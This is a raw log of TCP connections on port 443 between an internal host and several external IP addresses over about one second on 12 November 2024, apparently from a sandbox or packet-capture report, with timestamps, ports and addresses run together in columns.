                                                        Nov 12, 2024 16:27:04.287839890 CET49753443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.288348913 CET49761443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.288363934 CET4434976113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.288495064 CET49761443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.288907051 CET49761443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.288918018 CET4434976113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.291166067 CET49753443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.291177034 CET4434975313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.294316053 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.294382095 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.294544935 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.294598103 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.294615984 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.295414925 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.295444965 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.295464993 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.295471907 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.295499086 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.309588909 CET49762443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.309629917 CET4434976213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.309889078 CET49762443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.310100079 CET49762443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.310118914 CET4434976213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.316970110 CET4434975813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.317600012 CET49758443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.317609072 CET4434975813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.318306923 CET49758443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.318312883 CET4434975813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.336662054 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.365475893 CET4434975913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.366027117 CET49759443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.366046906 CET4434975913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.366930962 CET49759443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.366935968 CET4434975913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.383857012 CET44349751192.229.133.221192.168.2.6
                                                        Nov 12, 2024 16:27:04.407160997 CET4434975613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.407284975 CET4434975613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.407346010 CET49756443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.407747984 CET49756443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.407766104 CET4434975613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.407778978 CET49756443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.407783985 CET4434975613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.409205914 CET4434975713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.409699917 CET4434975713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.409749031 CET49757443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.409907103 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.409960032 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.410166979 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.410226107 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.410893917 CET49757443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.410907030 CET4434975713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.410984039 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.411037922 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.411422014 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.411473989 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.416802883 CET49763443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.416815996 CET4434976313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.416924000 CET49763443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.417809963 CET49763443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.417821884 CET4434976313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.418900013 CET49764443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.418920040 CET4434976413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.419167042 CET49764443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.419296980 CET49764443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.419310093 CET4434976413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.430413961 CET49751443192.168.2.6192.229.133.221
                                                        Nov 12, 2024 16:27:04.448097944 CET4434975813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.448306084 CET4434975813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.448357105 CET49758443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.448430061 CET49758443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.448441982 CET4434975813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.448451042 CET49758443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.448456049 CET4434975813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.452281952 CET49765443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.452302933 CET4434976513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.452574968 CET49765443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.452792883 CET49765443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.452805042 CET4434976513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.500277042 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.501537085 CET44349751192.229.133.221192.168.2.6
                                                        Nov 12, 2024 16:27:04.501552105 CET44349751192.229.133.221192.168.2.6
                                                        Nov 12, 2024 16:27:04.501580954 CET44349751192.229.133.221192.168.2.6
                                                        Nov 12, 2024 16:27:04.501594067 CET49751443192.168.2.6192.229.133.221
                                                        Nov 12, 2024 16:27:04.501599073 CET44349751192.229.133.221192.168.2.6
                                                        Nov 12, 2024 16:27:04.501610041 CET44349751192.229.133.221192.168.2.6
                                                        Nov 12, 2024 16:27:04.501627922 CET49751443192.168.2.6192.229.133.221
                                                        Nov 12, 2024 16:27:04.501637936 CET44349751192.229.133.221192.168.2.6
                                                        Nov 12, 2024 16:27:04.501646996 CET44349751192.229.133.221192.168.2.6
                                                        Nov 12, 2024 16:27:04.501655102 CET49751443192.168.2.6192.229.133.221
                                                        Nov 12, 2024 16:27:04.501677990 CET49751443192.168.2.6192.229.133.221
                                                        Nov 12, 2024 16:27:04.502593040 CET44349751192.229.133.221192.168.2.6
                                                        Nov 12, 2024 16:27:04.502657890 CET49751443192.168.2.6192.229.133.221
                                                        Nov 12, 2024 16:27:04.502662897 CET44349751192.229.133.221192.168.2.6
                                                        Nov 12, 2024 16:27:04.502751112 CET49751443192.168.2.6192.229.133.221
                                                        Nov 12, 2024 16:27:04.503097057 CET49751443192.168.2.6192.229.133.221
                                                        Nov 12, 2024 16:27:04.503110886 CET44349751192.229.133.221192.168.2.6
                                                        Nov 12, 2024 16:27:04.504715919 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:04.504740000 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:04.504748106 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:04.504761934 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:04.504769087 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:04.504775047 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:04.504801989 CET49750443192.168.2.618.245.31.89
                                                        Nov 12, 2024 16:27:04.504812002 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:04.504836082 CET49750443192.168.2.618.245.31.89
                                                        Nov 12, 2024 16:27:04.504849911 CET49750443192.168.2.618.245.31.89
                                                        Nov 12, 2024 16:27:04.508569002 CET44349754159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.509021044 CET44349754159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.509067059 CET44349754159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.509084940 CET49754443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:04.509123087 CET49754443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:04.514787912 CET4434975913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.514880896 CET4434975913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.514955997 CET49759443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.526627064 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.526690960 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.526982069 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.527038097 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.527734995 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.527787924 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.527796984 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.527828932 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.527837038 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.528026104 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.546446085 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:04.549160957 CET4434974713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.564652920 CET49759443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.564670086 CET4434975913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.564682007 CET49759443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.564687014 CET4434975913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.566581011 CET49766443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.566611052 CET4434976613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.566669941 CET49766443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.567548037 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.567554951 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.568365097 CET49766443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.568378925 CET4434976613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.578640938 CET49767443192.168.2.6152.199.21.175
                                                        Nov 12, 2024 16:27:04.578670025 CET44349767152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:04.578883886 CET49767443192.168.2.6152.199.21.175
                                                        Nov 12, 2024 16:27:04.579163074 CET49767443192.168.2.6152.199.21.175
                                                        Nov 12, 2024 16:27:04.579174042 CET44349767152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:04.592356920 CET49768443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.592370033 CET4434976813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.592431068 CET49768443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.592905045 CET49768443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.592917919 CET4434976813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.604420900 CET49747443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.606532097 CET49754443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:04.606542110 CET44349754159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.625547886 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.625579119 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.625650883 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.625907898 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.625920057 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.626580000 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.626596928 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.626863003 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.627321959 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.627331972 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.629986048 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:04.630012035 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:04.630059004 CET49750443192.168.2.618.245.31.89
                                                        Nov 12, 2024 16:27:04.630065918 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:04.630103111 CET49750443192.168.2.618.245.31.89
                                                        Nov 12, 2024 16:27:04.671343088 CET49747443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.671354055 CET4434974713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.672262907 CET49747443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.672272921 CET4434974713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.727304935 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.727325916 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.727339029 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.727355003 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.727363110 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.727365971 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:04.727384090 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.727421045 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:04.727432966 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.727471113 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:04.739348888 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:04.739368916 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:04.739423037 CET49750443192.168.2.618.245.31.89
                                                        Nov 12, 2024 16:27:04.739433050 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:04.739466906 CET49750443192.168.2.618.245.31.89
                                                        Nov 12, 2024 16:27:04.739500999 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:04.739542961 CET49750443192.168.2.618.245.31.89
                                                        Nov 12, 2024 16:27:04.739551067 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:04.739568949 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:04.739612103 CET49750443192.168.2.618.245.31.89
                                                        Nov 12, 2024 16:27:04.747023106 CET49750443192.168.2.618.245.31.89
                                                        Nov 12, 2024 16:27:04.747036934 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:04.774243116 CET49772443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.774281025 CET4434977213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.774399042 CET49772443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.775531054 CET49772443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.775547981 CET4434977213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.798203945 CET4434974713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.798609972 CET4434974713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.798661947 CET49747443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.801863909 CET49747443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.801875114 CET4434974713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.811791897 CET49773443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.811808109 CET4434977313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.811861038 CET49773443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.812319040 CET49773443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.812329054 CET4434977313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.829854012 CET49774443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:04.829862118 CET44349774159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.830148935 CET49774443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:04.830634117 CET49774443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:04.830645084 CET44349774159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.844166994 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.844178915 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.844207048 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.844252110 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:04.844259977 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.844294071 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:04.844307899 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:04.961414099 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.961435080 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.961486101 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:04.961496115 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.961544991 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:05.010385990 CET4434976113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.039072990 CET4434976213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.060590029 CET49761443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.078368902 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:05.078392029 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:05.078473091 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:05.078481913 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:05.078519106 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:05.092149019 CET49762443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.149239063 CET4434976313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.190834999 CET4434976413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.200202942 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:05.200227022 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:05.200283051 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:05.200293064 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:05.200344086 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:05.201179028 CET49763443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.222114086 CET4434976513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.222157955 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.244627953 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.247828007 CET49764443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.263680935 CET49765443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.263711929 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.294930935 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.302942038 CET4434976613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.316621065 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:05.316639900 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:05.316683054 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:05.316692114 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:05.316747904 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:05.345448971 CET4434976813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.357438087 CET49766443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.388566017 CET49768443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.433269024 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:05.433298111 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:05.433377981 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:05.433386087 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:05.433449030 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:05.434154034 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:05.434225082 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:05.434231997 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:05.434245110 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:05.434300900 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:05.434335947 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:05.508176088 CET4434977213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.558511972 CET4434977313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.559071064 CET49772443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.601768970 CET49761443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.601784945 CET4434976113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.601974964 CET49762443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.601999044 CET4434976213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.602345943 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.602365017 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.602933884 CET4434976213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.602938890 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.602945089 CET4434976213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.602957010 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.602993011 CET49762443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.603128910 CET4434976113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.603188038 CET49761443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.603271008 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.603288889 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.603329897 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.603451967 CET49766443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.603463888 CET4434976613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.603804111 CET49773443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.603858948 CET4434976613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.604012012 CET49768443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.604027033 CET4434976813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.604119062 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.604175091 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.604334116 CET4434976813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.612075090 CET49762443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.612138987 CET4434976213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.612849951 CET49761443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.613384008 CET4434976113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.613691092 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.613745928 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.614212036 CET49766443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.614303112 CET4434976613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.615168095 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.615238905 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.615629911 CET49768443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.615699053 CET4434976813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.619225025 CET49762443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.619232893 CET4434976213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.619393110 CET49761443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.619400024 CET4434976113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.619446039 CET49771443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.619457960 CET44349771104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.619550943 CET49766443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.619589090 CET49770443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:05.619597912 CET44349770104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:05.619893074 CET49768443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.624810934 CET49773443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.624819994 CET4434977313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.625741959 CET49773443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.625747919 CET4434977313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.626238108 CET49772443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.626244068 CET4434977213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.626929998 CET49772443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.626934052 CET4434977213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.627504110 CET49763443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.627513885 CET4434976313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.628196955 CET49763443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.628201962 CET4434976313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.628845930 CET44349767152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:05.629631042 CET49764443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.629643917 CET4434976413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.630367994 CET49764443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.630372047 CET4434976413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.630830050 CET49765443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.630841970 CET4434976513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.631654024 CET49765443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:05.631658077 CET4434976513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:05.637068987 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:05.637494087 CET49767443192.168.2.6152.199.21.175
                                                        Nov 12, 2024 16:27:05.637504101 CET44349767152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:05.639219999 CET44349767152.199.21.175192.168.2.6
                                                        Nov 12, 2024 16:27:05.639281034 CET49767443192.168.2.6152.199.21.175
